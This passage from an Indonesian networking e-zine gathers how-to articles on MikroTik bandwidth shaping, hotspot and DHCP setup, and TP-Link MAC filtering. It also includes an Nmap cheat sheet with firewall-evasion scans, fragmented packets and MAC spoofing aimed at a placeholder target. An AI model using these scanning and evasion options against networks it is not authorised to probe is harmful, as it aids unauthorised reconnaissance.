protocol=tcp
/ip firewall mangle add action=mark-connection chain=prerouting
comment="avi DOWNS" disabled=no layer7-protocol="Extension " .avi "" new-
connection-mark="avi DOWNS" passthrough=yes protocol=tcp
/ip firewall mangle add action=mark-packet chain=postrouting comment=""
connection-mark="avi DOWNS" disabled=no new-packet-mark=avi passthrough=no
protocol=tcp
26e-ZIT #Vol 2 - Networking
/ip firewall mangle add action=mark-connection chain=prerouting
comment="bin DOWNS" disabled=no layer7-protocol="Extension " .bin "" new-
connection-mark="bin DOWNS" passthrough=yes protocol=tcp
/ip firewall mangle add action=mark-packet chain=postrouting comment=""
connection-mark="bin DOWNS" disabled=no new-packet-mark=bin passthrough=no
protocol=tcp
/ip firewall mangle add action=mark-connection chain=prerouting
comment="flv DOWNS" disabled=no layer7-protocol="Extension " .flv "" new-
connection-mark="flv DOWNS" passthrough=yes protocol=tcp
/ip firewall mangle add action=mark-packet chain=postrouting comment=""
connection-mark="flv DOWNS" disabled=no new-packet-mark=flv passthrough=no
protocol=tcp
/ip firewall mangle add action=mark-connection chain=prerouting
comment="iso DOWNS" disabled=no layer7-protocol="Extension " .iso "" new-
connection-mark="iso DOWNS" passthrough=yes protocol=tcp
/ip firewall mangle add action=mark-packet chain=postrouting comment=""
connection-mark= "iso DOWNS" disabled=no new-packet-mark=iso passthrough=no
protocol=tcp
/ip firewall mangle add action=mark-connection chain=prerouting
comment="mkv DOWNS" disabled=no layer7-protocol="Extension " .mkv "" new-
connection-mark="mkv DOWNS" passthrough=yes protocol=tcp
/ip firewall mangle add action=mark-packet chain=postrouting comment=""
connection-mark="mkv DOWNS" disabled=no new-packet-mark=mkv passthrough=no
protocol=tcp
/ip firewall mangle add action=mark-connection chain=prerouting
comment="exe DOWNS" disabled=no layer7-protocol="Extension " .exe "" new-
connection-mark="exe DOWNS" passthrough=yes protocol=tcp
/ip firewall mangle add action=mark-packet chain=postrouting comment=""
connection-mark="exe DOWNS" disabled=no new-packet-mark=exe passthrough=no
protocol=tcp
/ip firewall mangle add action=mark-connection chain=prerouting
comment="mov DOWNS" disabled=no layer7-protocol="Extension " .mov "" new-
connection-mark="mov DOWNS" passthrough=yes protocol=tcp
/ip firewall mangle add action=mark-packet chain=postrouting comment=""
connection-mark="mov DOWNS" disabled=no new-packet-mark=mov passthrough=no
protocol=tcp
/ip firewall mangle add action=mark-connection chain=prerouting
comment="mp3 DOWNS" disabled=no layer7-protocol="Extension " .mp3 "" new-
connection-mark="mp3 DOWNS" passthrough=yes protocol=tcp
/ip firewall mangle add action=mark-packet chain=postrouting comment=""
connection-mark="mp3 DOWNS" disabled=no new-packet-mark=mp3 passthrough=no
protocol=tcp
/ip firewall mangle add action=mark-connection chain=prerouting
comment="mp4 DOWNS" disabled=no layer7-protocol="Extension " .mp4 "" new-
connection-mark="mp4 DOWNS" passthrough=yes protocol=tcp
/ip firewall mangle add action=mark-packet chain=postrouting comment=""
connection-mark="mp4 DOWNS" disabled=no new-packet-mark=mp4 passthrough=no
protocol=tcp
/ip firewall mangle add action=mark-connection chain=prerouting
comment="mpeg DOWNS" disabled=no layer7-protocol="Extension " .mpeg ""
new-connection-mark="mpeg DOWNS" passthrough=yes protocol=tcp
/ip firewall mangle add action=mark-packet chain=postrouting comment=""
connection-mark="mpeg DOWNS" disabled=no new-packet-mark=mpeg
27e-ZIT #Vol 2 - Networking
passthrough=no protocol=tcp
/ip firewall mangle add action=mark-connection chain=prerouting
comment="mpg DOWNS" disabled=no layer7-protocol="Extension " .mpg "" new-
connection-mark="mpg DOWNS" passthrough=yes protocol=tcp
/ip firewall mangle add action=mark-packet chain=postrouting comment=""
connection-mark="mpg DOWNS" disabled=no new-packet-mark=mpg passthrough=no
protocol=tcp
/ip firewall mangle add action=mark-connection chain=prerouting
comment="nrg DOWNS" disabled=no layer7-protocol="Extension " .nrg "" new-
connection-mark="nrg DOWNS" passthrough=yes protocol=tcp
/ip firewall mangle add action=mark-packet chain=postrouting comment=""
connection-mark="nrg DOWNS" disabled=no new-packet-mark=nrg passthrough=no
protocol=tcp
/ip firewall mangle add action=mark-connection chain=prerouting
comment="ram DOWNS" disabled=no layer7-protocol="Extension " .ram "" new-
connection-mark="ram DOWNS" passthrough=yes protocol=tcp
/ip firewall mangle add action=mark-packet chain=postrouting comment=""
connection-mark="ram DOWNS" disabled=no new-packet-mark=ram passthrough=no
protocol=tcp
/ip firewall mangle add action=mark-connection chain=prerouting
comment="rar DOWNS" disabled=no layer7-protocol="Extension " .rar "" new-
connection-mark="rar DOWNS" passthrough=yes protocol=tcp
/ip firewall mangle add action=mark-packet chain=postrouting comment=""
connection-mark="rar DOWNS" disabled=no new-packet-mark=rar passthrough=no
protocol=tcp
/ip firewall mangle add action=mark-connection chain=prerouting comment="rm
DOWNS" disabled=no layer7-protocol="Extension " .rm "" new-connection-
mark="rm DOWNS" passthrough=yes protocol=tcp
/ip firewall mangle add action=mark-packet chain=postrouting comment=""
connection-mark="rm DOWNS" disabled=no new-packet-mark=rm passthrough=no
protocol=tcp
/ip firewall mangle add action=mark-connection chain=prerouting
comment="rmvb DOWNS" disabled=no layer7-protocol="Extension " .rmvb ""
new-connection-mark="rmvb DOWNS" passthrough=yes protocol=tcp
/ip firewall mangle add action=mark-packet chain=postrouting comment=""
connection-mark="rmvb DOWNS" disabled=no new-packet-mark=rmvb
passthrough=no protocol=tcp
/ip firewall mangle add action=mark-connection chain=prerouting
comment="wav DOWNS" disabled=no layer7-protocol="Extension " .wav "" new-
connection-mark="wav DOWNS" passthrough=yes protocol=tcp
/ip firewall mangle add action=mark-packet chain=postrouting comment=""
connection-mark="wav DOWNS" disabled=no new-packet-mark=wav passthrough=no
protocol=tcp
/ip firewall mangle add action=mark-connection chain=prerouting
comment="wma DOWNS" disabled=no layer7-protocol="Extension " .wma "" new-
connection-mark="wma DOWNS" passthrough=yes protocol=tcp
/ip firewall mangle add action=mark-packet chain=postrouting comment=""
connection-mark="wma DOWNS" disabled=no new-packet-mark=wma passthrough=no
protocol=tcp
/ip firewall mangle add action=mark-connection chain=prerouting
comment="wmv DOWNS" disabled=no layer7-protocol="Extension " .wmv "" new-
connection-mark="wmv DOWNS" passthrough=yes protocol=tcp
/ip firewall mangle add action=mark-packet chain=postrouting comment=""
28e-ZIT #Vol 2 - Networking
connection-mark="wmv DOWNS" disabled=no new-packet-mark=wmv passthrough=no
protocol=tcp
/ip firewall mangle add action=mark-connection chain=prerouting
comment="zip DOWNS" disabled=no layer7-protocol="Extension " .zip "" new-
connection-mark="zip DOWNS" passthrough=yes protocol=tcp
/ip firewall mangle add action=mark-packet chain=postrouting comment=""
connection-mark="zip DOWNS" disabled=no new-packet-mark=zip passthrough=no
protocol=tcp
/ip firewall mangle add action=mark-connection chain=prerouting
comment="youtube DOWNS" disabled=no layer7-protocol="YouTube " new-
connection-mark="youtube DOWNS" passthrough=yes protocol=tcp
/ip firewall mangle add action=mark-packet chain=postrouting comment=""
connection-mark="youtube DOWNS" disabled=no new-packet-mark=youtube
passthrough=no protocol=tcp
/ip firewall mangle add action=mark-connection chain=prerouting
comment="daa DOWNS" disabled=no layer7-protocol="Extension " .daa "" new-
connection-mark="daa DOWNS" passthrough=yes protocol=tcp
/ip firewall mangle add action=mark-packet chain=postrouting comment=""
connection-mark="daa DOWNS" disabled=no new-packet-mark=daa passthrough=no
protocol=tcp
/ip firewall mangle add action=mark-connection chain=prerouting
comment="dat DOWNS" disabled=no layer7-protocol="Extension " .dat "" new-
connection-mark="dat DOWNS" passthrough=yes protocol=tcp
/ip firewall mangle add action=mark-packet chain=postrouting comment=""
connection-mark="dat DOWNS" disabled=no new-packet-mark=dat passthrough=no
protocol=tcp
/ip firewall mangle add action=mark-connection chain=prerouting
comment="vcd DOWNS" disabled=no layer7-protocol="Extension " .vcd "" new-
connection-mark="vcd DOWNS" passthrough=yes protocol=tcp
/ip firewall mangle add action=mark-packet chain=postrouting comment=""
connection-mark="vcd DOWNS" disabled=no new-packet-mark=vcd passthrough=no
protocol=tcp
/ip firewall mangle add action=mark-connection chain=prerouting
comment="cab DOWNS" disabled=no layer7-protocol="Extension " .cab "" new-
connection-mark="cab DOWNS" passthrough=yes protocol=tcp
/ip firewall mangle add action=mark-packet chain=postrouting comment=""
connection-mark="cab DOWNS" disabled=no new-packet-mark=cab passthrough=no
protocol=tcp
3. selajutnya tahap akhir, yaitu managemen bandwith. Disini kita menggunakan simple
queue. Yah seperti biasa kita kita gunakan metode yang sangat umum :”COPY
PASTE”: masuk ke terminal mikrotik dan pastekan perintah dibawah ini :
Code:
/queue simple add name="exe" dst-address=0.0.0.0/0 interface=all
parent=none packet-marks=exe direction=both priority=8 queue=default-
small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-
threshold=0/0 burst-time=0s/0s total-queue=default-small
/queue simple add name="rar" dst-address=0.0.0.0/0 interface=all
parent=none packet-marks=rar direction=both priority=8 queue=default-
29e-ZIT #Vol 2 - Networking
small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-
threshold=0/0 burst-time=0s/0s total-queue=default-small
/queue simple add name="zip" dst-address=0.0.0.0/0 interface=all
parent=none packet-marks=zip direction=both priority=8 queue=default-
small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-
threshold=0/0 burst-time=0s/0s total-queue=default-small
/queue simple add name="7z" dst-address=0.0.0.0/0 interface=all parent=none
packet-marks=7z direction=both priority=8 queue=default-small/default-small
limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-threshold=0/0 burst-
time=0s/0s total-queue=default-small
/queue simple add name="cab" dst-address=0.0.0.0/0 interface=all
parent=none packet-marks=cab direction=both priority=8 queue=default-
small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-
threshold=0/0 burst-time=0s/0s total-queue=default-small
/queue simple add name="asf" dst-address=0.0.0.0/0 interface=all
parent=none packet-marks=asf direction=both priority=8 queue=default-
small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-
threshold=0/0 burst-time=0s/0s total-queue=default-small
/queue simple add name="mov" dst-address=0.0.0.0/0 interface=all
parent=none packet-marks=mov direction=both priority=8 queue=default-
small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-
threshold=0/0 burst-time=0s/0s total-queue=default-small
/queue simple add name="wmv" dst-address=0.0.0.0/0 interface=all
parent=none packet-marks=wmv direction=both priority=8 queue=default-
small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-
threshold=0/0 burst-time=0s/0s total-queue=default-small
/queue simple add name="mpg" dst-address=0.0.0.0/0 interface=all
parent=none packet-marks=mpg direction=both priority=8 queue=default-
small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-
threshold=0/0 burst-time=0s/0s total-queue=default-small
/queue simple add name="mpeg" dst-address=0.0.0.0/0 interface=all
parent=none packet-marks=mpeg direction=both priority=8 queue=default-
small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-
threshold=0/0 burst-time=0s/0s total-queue=default-small
/queue simple add name="mkv" dst-address=0.0.0.0/0 interface=all
parent=none packet-marks=mkv direction=both priority=8 queue=default-
small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-
threshold=0/0 burst-time=0s/0s total-queue=default-small
/queue simple add name="avi" dst-address=0.0.0.0/0 interface=all
parent=none packet-marks=avi direction=both priority=8 queue=default-
small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-
threshold=0/0 burst-time=0s/0s total-queue=default-small
/queue simple add name="flv" dst-address=0.0.0.0/0 interface=all
parent=none packet-marks=flv direction=both priority=8 queue=default-
small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-
threshold=0/0 burst-time=0s/0s total-queue=default-small
/queue simple add name="wav" dst-address=0.0.0.0/0 interface=all
parent=none packet-marks=wav direction=both priority=8 queue=default-
small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-
threshold=0/0 burst-time=0s/0s total-queue=default-small
/queue simple add name="rm" dst-address=0.0.0.0/0 interface=all parent=none
packet-marks=rm direction=both priority=8 queue=default-small/default-small
limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-threshold=0/0 burst-
30e-ZIT #Vol 2 - Networking
time=0s/0s total-queue=default-small
/queue simple add name="mp3" dst-address=0.0.0.0/0 interface=all
parent=none packet-marks=mp3 direction=both priority=8 queue=default-
small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-
threshold=0/0 burst-time=0s/0s total-queue=default-small
/queue simple add name="mp4" dst-address=0.0.0.0/0 interface=all
parent=none packet-marks=mp4 direction=both priority=8 queue=default-
small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-
threshold=0/0 burst-time=0s/0s total-queue=default-small
/queue simple add name="ram" dst-address=0.0.0.0/0 interface=all
parent=none packet-marks=ram direction=both priority=8 queue=default-
small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-
threshold=0/0 burst-time=0s/0s total-queue=default-small
/queue simple add name="rmvb" dst-address=0.0.0.0/0 interface=all
parent=none packet-marks=rmvb direction=both priority=8 queue=default-
small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-
threshold=0/0 burst-time=0s/0s total-queue=default-small
/queue simple add name="dat" dst-address=0.0.0.0/0 interface=all
parent=none packet-marks=dat direction=both priority=8 queue=default-
small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-
threshold=0/0 burst-time=0s/0s total-queue=default-small
/queue simple add name="daa" dst-address=0.0.0.0/0 interface=all
parent=none packet-marks=daa direction=both priority=8 queue=default-
small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-
threshold=0/0 burst-time=0s/0s total-queue=default-small
/queue simple add name="iso" dst-address=0.0.0.0/0 interface=all
parent=none packet-marks=iso direction=both priority=8 queue=default-
small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-
threshold=0/0 burst-time=0s/0s total-queue=default-small
/queue simple add name="nrg" dst-address=0.0.0.0/0 interface=all
parent=none packet-marks=nrg direction=both priority=8 queue=default-
small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-
threshold=0/0 burst-time=0s/0s total-queue=default-small
/queue simple add name="bin" dst-address=0.0.0.0/0 interface=all
parent=none packet-marks=bin direction=both priority=8 queue=default-
small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-
threshold=0/0 burst-time=0s/0s total-queue=default-small
/queue simple add name="vcd" dst-address=0.0.0.0/0 interface=all
parent=none packet-marks=vcd direction=both priority=8 queue=default-
small/default-small limit-at=0/0 max-limit=32k/32k burst-limit=0/0 burst-
threshold=0/0 burst-time=0s/0s total-queue=default-small
ip firewall mangle add action=mark-packet chain=prerouting comment="http-
video mark-packet" disabled=no layer7-protocol=http-video new-packet-
mark=http-video passthrough=no
/queue simple add name="youtube" dst-address=0.0.0.0/0 interface=all
parent=none packet-marks=http-video direction=both priority=8
queue=default-small/default-small limit-at=0/0 max-limit=32k/32k burst-
limit=0/0 burst-threshold=0/0 burst-time=0s/0s total-queue=default-small
Sumber : http://www.wiki.mikrotik.com
31e-ZIT #Vol 2 - Networking
sory kalau configurasinya bukan dari awal configurasi, disini saya menganggap anda telah
sukses mengkonfigurasi mikrotiknya hingga terkoneksi :peace: :peace:
ket : experiment ini sangat cocok buat warnet dgn bandwidth kecil atau terbatas (contoh
kasus : warnet saya dulu) (khusus indonesia bagian timur yang harga bandwitdh mahal)
./regards
shockw4v3
32e-ZIT #Vol 2 - Networking
Mikrotik > Cara Sederhana Membuat Hotspot
I'm comeback again...!!!
tanpa banyak basa basi lagi... mari kita lihat gimana caranya mengconfigurasi mikrotik
untuk membuat jaringan hotspot...
cekidot :dance:
beri ip masing-masing LAN CARD!!
Code:
[admin@Mikrotik] > ip address add address=192.168.0.2/30 interface=UpLink
[admin@Mikrotik] > ip address add address=192.168.1.1/24 interface=Lokal
[admin@Mikrotik] > ip address add address=192.168.2.1/24 interface=HotSpot
interface=HotSpot ini adalah koneksi ke wireless (wifi) kita
Masukkan default routenya
Code:
[admin@MikroTik] > ip route add gateway 192.168.0.1
Kemudian Setting HotSpotnya
Code:
[admin@MikroTik] > ip hotspot setup
hotspot interface: HotSpot local address of network: 192.168.2.1/24
masquerade network: yes address pool of network: 192.168.2.2-192.168.2.99
select certificate: none ip address of smtp server: 0.0.0.0 dns servers:
192.168.2.1
dns name: hotspot.com name of local hotspot user: user password for the
user: ****password***
(user & password ganti terserah kita)
ok! sampai disini... settingan hotspot telah berhasil dilakukan dan siap dipakai....
./regards
Feenx_O
33e-ZIT #Vol 2 - Networking
Mikrotik > Pisah Download, Browse & Game di 1 Line
ini kisah cerita waktu tahun 2009 :maybe:
pada kebingungan pas waktu di suruh bos buka warnet + game online dengan 1 line isp.....
akhirnya nemu juga cara setingnya....
nah sekarang langsung aja ah…..
Test running well di RB450 OS ver.4.5
ISP= Astinet TALIKOM 1Mbps
Mangle:
GAME
contoh buat Point Blank, game lain sesuaikan aja port/ip nya karna ane cuma sediakan Point
Blank aja di warnet :)
Code:
chain=game action=mark-connection new-connection-mark=Game passthrough=yes
protocol=tcp dst-address=203.89.146.0/23 dst-port=39190 comment=”Point
Blank”
Code:
chain=game action=mark-connection new-connection-mark=Game passthrough=yes
protocol=udp dst-address=203.89.146.0/23 dst-port=40000-40010
Code:
chain=game action=mark-packet new-packet-mark=Game_pkt passthrough=no
connection-mark=Game
Code:
chain=prerouting action=jump jump-target=game
POKER - paling banyak main bahkan game FB terlaris di kota ane untuk saat itu
Code:
chain=forward action=mark-connection new-connection-mark=Poker_con
passthrough=yes protocol=tcp dst-address-list=LOAD POKER comment=”POKER”
Code:
chain=forward action=mark-connection new-connection-mark=Poker_con
passthrough=yes protocol=tcp content=statics.poker.static.zynga.com
Code:
chain=forward action=mark-packet new-packet-mark=Poker passthrough=no
connection-mark=Poker_con
34e-ZIT #Vol 2 - Networking
BROWSING
Code:
chain=forward action=mark-connection new-connection-mark=http
passthrough=yes protocol=tcp in-interface=WAN out-interface=Lan packet-
mark=!Game_pkt connection-mark=!Game connection-bytes=0-262146
comment=”BROWSE”
Code:
chain=forward action=mark-packet new-packet-mark=http_pkt passthrough=no
protocol=tcp connection-mark=http
UPLOAD
Code:
chain=prerouting action=mark-packet new-packet-mark=Upload passthrough=no
protocol=tcp src-address=192.168.0.0/24 in-interface=Lan packet-
mark=!icmp_pkt comment=”UPLOAD”
LIMIT DOWNLOAD
Code:
chain=forward action=mark-connection new-connection-mark=Download
passthrough=yes protocol=tcp in-interface=WAN out-interface=Lan packet-
mark=!Game_pkt connection-mark=!Poker_con connection bytes=262146-
4294967295 comment=”LIMIT DOWNLOAD”
Code:
chain=forward action=mark-packet new-packet-mark=Download_pkt
passthrough=no packet-mark=!Game_pk> connection-mark=Download
QUEUE
queue type
Code:
name=”Download” kind=pcq pcq-rate=256000 pcq-limit=50 pcq-classifier=dst-
address pcq-total-limit=2000
Code:
name=”Http” kind=pcq pcq-rate=1M pcq-limit=50 pcq-classifier=dst-address
pcq-total-limit=2000
Code:
name=”Game” kind=pcq pcq-rate=0 pcq-limit=50 pcq-classifier=src-
address,dst-address,src-port,dst-port pcq-total-limit=2000
Code:
name=”Upload” kind=pcq pcq-rate=0 pcq-limit=50 pcq-classifier=src-address
pcq-total-limit=2000
35e-ZIT #Vol 2 - Networking
Queue Tree
Code:
name=”Main Browse” parent=Lan limit-at=0 priority=8 max-limit=1M burst-
limit=0 burst-threshold=0 burst-time=0s
Code:
name=”Browse” parent=Main Browse packet-mark=http_pkt limit-at=0 queue=Http
priority=8 max-limit=1M burst-limit=0 burst-threshold=0 burst-time=0s
Code:
name=”Game” parent=global-total packet-mark=Game_pkt limit-at=0 queue=Game
priority=1 max-limit=0 burst-limit=0 burst-threshold=0 burst-time=0s
Code:
name=”Poker” parent=global-out packet-mark=Poker limit-at=0 queue=Game
priority=3 max-limit=0 burst-limit=0 burst-threshold=0 burst-time=0s
Code:
name=”Download” parent=global-out packet-mark=Download_pkt limit-at=0
queue=Download priority=8 max-limit=256k burst-limit=0 burst-threshold=0
burst-time=0s
Code:
name=”Main Upload” parent=global-in limit-at=0 priority=8 max-limit=256k
burst-limit=0 burst-threshold=0 burst-time=0s
Code:
name=”Upload” parent=Main Upload packet-mark=Upload limit-at=0 queue=Upload
priority=8 max-limit=0 burst-limit=0 burst-threshold=0 burst-time=0s
HASILNYA
BROWSING 1Mbs > bagi rata 1 warnet
DOWNLOAD 256Kbps > bagi rata 1 warnet
GAME > seadanya bandwith sesuai kebutuhan 1 warnet
POKER > seadanya bandwith sesuai kebutuhan 1 warnet
UPLOAD > seadanya bandwith bagi rata sesuai kebutuhan 1 warnet
mungkin setingan ini belum sempurna.... buat kk ama om yg lain mungkin bisa kasih
pencerahan ato tambahan
./regards
shockw4f3
36e-ZIT #Vol 2 - Networking
Mikrotik > Leases Static DHCP
Kebetulan ne cara mau dipake buat keperluan sendiri. Berhubung Hotspot di kantor pake
DHCP, trus HP yang connect juga sering dipake buat experiment di LAN, tapi karena IP LAN
nya DHCP jadinya server di HP jadi berubah-ubah. Dan karena tidak ada opsi untuk setting IP
di HP, jadi solusinya adalah meminjamkan IP dari DHCP secara statik dari mikrotik. Yarp,
langsung ke command nya ja...
Code:
[admin@MikroTik] > /ip dhcp-server lease add address=1.2.3.4 mac-
address=aa:bb:cc:dd:ee:ff server=dhcp_pool_name disabled=no
Simple aja sih, untuk parameternya tinggal menyesuaikan device masing-masing yang akan
di set. Kalo Static DHCP nya banyak, biar gak bingung, masing-masing rules diatas
tambahkan parameter "comment". Ah, kayaknya udah pada tauk :D
Semoga bermanfaat ja buat yang belum tau. ^_^
Source: http://forum.mikrotik.com/viewtopic.php?f=13&t=42587
./regards
JMozac
37e-ZIT #Vol 2 - Networking
Network Scanning With NMAP
Halooooooo Heuheu,
Yup ketemu lagi sama Bifi,
pada thread sebelummnya kan kaka shockw4v3, udah bagi-bagi tips tentang command-
command ping kan, itu lho command atau apalah, bawaan hampir semua OS untuk
mengecek komunikasi antar komputer dalam sebuah jaringan melalui protocol TCP/IP,,,
Nah seperti gambar di atas, Kali ini Bifi mau share tentang tips network scanning with
Nmap, atau bahasa torang dong bilang scan jaringan pake Nmap, nah apa itu Nmap ??? Ini
dia penjelasannya :
"Nmap (“Network Mapper”) merupakan sebuah tool open source untuk eksplorasi dan audit
keamanan jaringan. Ia dirancang untuk memeriksa jaringan besar secara cepat, meskipun ia
dapat pula bekerja terhadap host tunggal. Nmap menggunakan paket IP raw dalam cara
yang canggih untuk menentukan host mana saja yang tersedia pada jaringan, layanan
(nama aplikasi dan versi) apa yang diberikan, sistem operasi (dan versinya) apa yang
digunakan, apa jenis firewall/filter paket yang digunakan, dan sejumlah karakteristik
lainnya"
di kutip dari situs resmi NMAP...
nah, untuk para networker, pasti udah nggak asing lagi dengan tools yang 1 ini.. Ok,
kebanyakan penjelasan nih,
langsung aja ah,....
Open Terminal Truz Coba Aja Satu-Satu
kayak gambar dibawah ini
38e-ZIT #Vol 2 - Networking
Neh, Command-Commandnya
Code:
nmap -n -sn [ip target] < Multi ip address dan subnet
nmap --packet-trace [ip target] < Menampilkan paket diterima dan dikirim
nmap --iflist < Menampilkan semua interface dan rute
nmap 192.168.2.0/24 --exclude [IP] < Excluding hosts/networks
nmap -A [ip target] < Scan OS Dan Layanan (service target)
nmap -O [ip target] < remote operating system
nmap -sP [ip target] < Mendeteksi layanan dan device yang sedang up
nmap -sV [ip target] < Mendeteksi versi dari layanan (service)
nmap -sA [ip target] < Mendeteksi firewall
Code:
nmap -sN [ip target] < Scanning firewall | TCP Null Scan untuk menipu
firewall untuk memberikan respon ,dalam kondisi TCP flag header adalah nol
(null)
nmap -sF [ip target] < Scanning firewall | TCP Fin scan untuk mengecek
firewall ,hanya TCP FIN bit
nmap -sX [ip target] < Scanning firewall | Penggunaan TCP Xmas & setting
FIN, PSH, dan URG
Code:
nmap -f [site target] < Firewall untuk packets fragments
nmap -PN [site target] < Melakukan scanning disaat target menggunakan
firewall
nmap -F [ip target] < Fast Scann
nmap --reason [ip target] < Opsi Reason
nmap --open [ip target] < Menampilkan hanya port yang terbuka
nmap -T5 [ip target] < Scanning terhadap subnet
39e-ZIT #Vol 2 - Networking
Code:
nmap -p 80 [ip target] < Melakukan scann terhadap port tertentu .. dalam
hal ini port 80
nmap -p T:80 [ip target] < Melakukan scann terhadap port tertentu dengan
protokol tcp
nmap -p U:53 [ip target] < Melakukan scann terhadap port tertentu dengan
protokol udp
Code:
nmap -p "*" [ip target] < Scann seluruh port dengan opsi "*"
nmap --top-ports 3 [IP] < top ports
nmap -sO [ip target] < IP protocol PING
nmap -PS [ip target] < TCP ACK (PA) and TCP Syn (PS) ping
nmap -PA [ip target] < Untuk penggunaan TCP Syn
Code:
nmap -sS [ip target] < TCP SYN Scan | Penggunaan Stealthy scan [-sS]
nmap -sT [ip target] < TCP SYN Scan | TCP connect scan (warning: no stealth
scan) [-sT]
nmap -sA [ip target] < TCP SYN Scan | Menemukan keberadaan TCP ports
menggunakan TCP ACK scan [-sA]
nmap -sW [ip target] < TCP SYN Scan | Menemukan keberadaan TCP ports
menggunakan TCP Window scan [-sW]
nmap -sM [ip target] < TCP SYN Scan | Menemukan keberadaan TCP ports
menggunakan TCP Maimon scan
Code:
nmap -PO [ip target] < IP protocol ping
nmap -sU [ip target] < UDP services (UDP scan)
nmap -PU [ip target] < UDP ping | Melakukan scanning terhadap ip, khusus
mencari port UDP
nmap -PU 2000.2001 [ip target] < UDP ping | Melakukan scanning port UDP
yang telah di tentukan
Code:
nmap --spoof-mac [mac address palsu kita] [ip target] < MAC address
spoofing
nmap --spoof-mac 0 [IP HOST] < Jika anda hendak menggunakan mac address
spoofing secara random (acak)
Mungkin itu saja sedikit command-command NMAP dari saya,,,
silahkan di coba ... eheheheheh
./regards
Bifi
40e-ZIT #Vol 2 - Networking
Security > Setting Mac Filtering Pada AP TP-LINK TL-WA610G
yup yup...i'm back....sesuai dengan judulnya, kali ini qt akan membangun security mac
filtering... sedikit penjelasan :
 Wireless Access Point (WAP) adalah perangkat keras yang memungkinkan perangkat
wireless lain (seperti laptop, ponsel) untuk terhubung ke jaringan kabel
menggunakan Wi-fi, bluetooh atau perangkat standar lainnya.
 Access Point berfungsi sebagai pengatur lalu lintas data, sehingga memungkinkan
banyak Client dapat saling terhubung melalui jaringan.
Sebagai Hub/Switch yang bertindak untuk menghubungkan jaringan lokal dengan
jaringan wireless/nirkabel, Access point dapat memancarkan atau mengirim koneksi
data / internet melalui gelombang radio, ukuran kekuatan sinyal juga mempengaruhi
area coverage yang akan dijangkau, semakin besar kekuatan sinyal (ukurannya dalam
satuan dBm atau mW) semakin luas jangkauannya.
 Media Acces Control (MAC) adalah identitas sebuah perangkat jaringan yg
direprensentasikan dalam bentuk hardware-address atau physical address untuk
setiap node yg terhubung dalam sebuah jaringan
sedikit lagi penjelasan yak...yang sabar yak, kata pepatah, orang sabar selalu berada
disamping pagar
Quote:MAC filter fungsinya untuk menseleksi komputer mana yang boleh masuk kedalam
jaringan berdasarkan MAC Address. Bila tidak terdaftar, tidak akan bisa masuk ke jaringan.
MAC filter Address akan membatasi user dalam mengakses jaringan wireless. Alamat MAC
dari perangkat komputer user akan didaftarkan terlebih dahulu agar bisa terkoneksi dengan
jaringan wireless,
ok langsung kita masuk k intinya...persiapan :
1. Laptop/PC juga boleh
2. Kabel LAN (minimal 1 meter) lebih juga boleh
3. Access Point (kali ini ane menggunakan TP-LINk TLWA610G)
4. yang paling penting adalah rokok coy
tahap :
1. colok kabel LAN ke AP lalu ujung yg satunya lagi colok ke LAN card laptop
2. buka browser, ketik pada address bar ketik 192.168.1.1 lalu tekan enter. qt akan
diminta memasukan username dan password. default username dan password pada
acces point adalah username : admin password : admin.... lalu tekan enter...
41e-ZIT #Vol 2 - Networking
3. setelah masuk ke tampilan awal, lalu click network, seperti d bawah ini :
o Type : ada dua pilihan, yaitu static IP dan Dinamic IP (DHCP). pilih sesuai
kebutuhan. kali ini ane make Static IP (ipnya qt input manual)
o IP Addres, defaultnya tadi 192.168.1.1, bisa diganti, terserah teman-teman
sekalian mau diganti degan berapa, kali ini qt ganti dengan 192.168.1.111 (IP
kelas C)
o Subnet mask, qt masukan 255.255.255.0
o Gateway : qr masukan 192.168.1.250, gateway tergantung settingan d
tempat teman2....
o Click Save
42e-ZIT #Vol 2 - Networking
4. setelah itu click wireless lalu click basic settings, seperti dibawah ini :
o SSID : Terserah mau dinamakan apa
o Region/regional : ane masukan Indonesia..cinta negeri sendiri coy (nyari
aman :-P)
o Channel : terserah teman2 sekalian,defaultnya 6..
o Mode : defaultnya 54Mbps (802.11g), make default juga boleh
o click save lagi coy
5. selanjutnya click Mac Filtering, lalu click Enable, untuk mengaktifkan mac
filteringnya, lalu click Deny
43e-ZIT #Vol 2 - Networking
6. lanjut coy, click DHCP, lalu click DHCP setting, kegunaan dari DHCP adalah agar client
mendapat IP secara otomatis, biar nggak nambah kerjaan qt untuk setting manual d
lepi/kompi client...
o click enable pada DHCP SERVER
o Start IP Address : ane masukan 192.168.1.100, tpi tergantung teman2 mau
start IP-nya mulai dari berapa
o End IP address : ane masukan 192.168.1.199
o Address Least Time dibiarin default aja
o Default Gateway : qt masukan sama dengan yg qt masukan pada point 3 tadi
yaitu 192.168.1.250
o Primary DNS : masukan primary DNS-nya
o Secondary DNS : alternatif DNS (cadangan)
o click save lagi coy
7. Selanjutnya qt ganti username and password AP : Click System Tools --> Password....
seperti dibawah ini
44e-ZIT #Vol 2 - Networking
o Old user name : defaultnya admin
